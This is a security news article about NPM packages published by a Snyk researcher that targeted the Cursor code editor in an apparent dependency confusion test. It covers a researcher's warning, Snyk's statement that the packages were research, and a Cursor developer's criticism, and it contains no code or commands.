Several apparently malicious NPM packages linked to Snyk raised some concerns, but the developer security firm said they were part of a research project and suggested that there was no risk to anyone.
SourceCodeRed researcher Paul McCarty raised the alarm last week when he spotted the packages on the NPM Registry, warning that the packages were designed to collect data about the system and send it back to the attacker.
McCarty’s analysis revealed that the NPM packages in question were deployed by someone from Snyk and the target was AI code editor Cursor.
“Now, typically, when we see packages like this, they are attempting to perform a dependency confusion attack on a specific company. I don’t know if Cursor.com has a bug bounty program or a specific background,” McCarty explained.
“The person who created these packages is probably hoping that Cursor employees accidentally install these public packages, which will send their data to the attacker-controlled web service,” he added.
The NPM packages raised some questions and concerns on social media, but Snyk assured everyone on Tuesday that the packages were not malicious.
Snyk told SecurityWeek in an emailed statement, which has also been posted in response to the social media posts, that the packages were released as part of a research project focusing on dependency confusion.
“Snyk Research Labs regularly contributes back to the community with testing and research of common software packages,” said Snyk CTO Danny Allan. “This particular research into Cursor was not intended to be malicious and included Snyk Research Labs and the contact information of the researcher. We were very specifically looking at dependency confusion in some VS Code extensions. The packages would not be installed directly by a developer.”
Allan added, “Snyk does follow a responsible disclosure policy and while no one picked this package up, had anyone done so, we would have immediately followed up with them.”
The packages have been removed from the NPM Registry.
Malicious NPM packages have made many headlines in recent years so it’s not surprising that Snyk’s packages raised concerns.
Someone claiming to be a developer at Cursor said the company got an apology from Snyk after the existence of the packages came to light, but described the security firm’s actions as “irresponsible”.
Related: Microsoft DRM Hacking Raises Questions on Vulnerability Disclosures
Related: Prototype UEFI Bootkit is South Korean University Project; LogoFAIL Exploit Discovered
Related: Hundreds Download Malicious NPM Package Capable of Delivering Rootkit
Related: Dozens of Malicious NPM Packages Steal User, System Data
